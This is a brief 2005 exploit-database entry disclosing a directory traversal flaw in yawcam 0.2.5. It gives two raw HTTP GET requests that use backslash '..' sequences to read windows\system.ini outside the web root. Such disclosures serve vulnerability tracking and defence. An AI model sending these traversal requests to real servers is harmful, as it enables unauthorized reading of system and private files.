yawcam 0.2.5 - Directory Traversal

2005-04-21T00:00:00
ID EXPLOITPACK:9CD3345189C0AD93C77A0636EEE4FC33
Type exploitpack
Reporter Donato Ferrante
Modified 2005-04-21T00:00:00

Description

yawcam 0.2.5 - Directory Traversal

                                        
                                            source: https://www.securityfocus.com/bid/13295/info

Yawcam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. 

GET ..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0

GET \..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0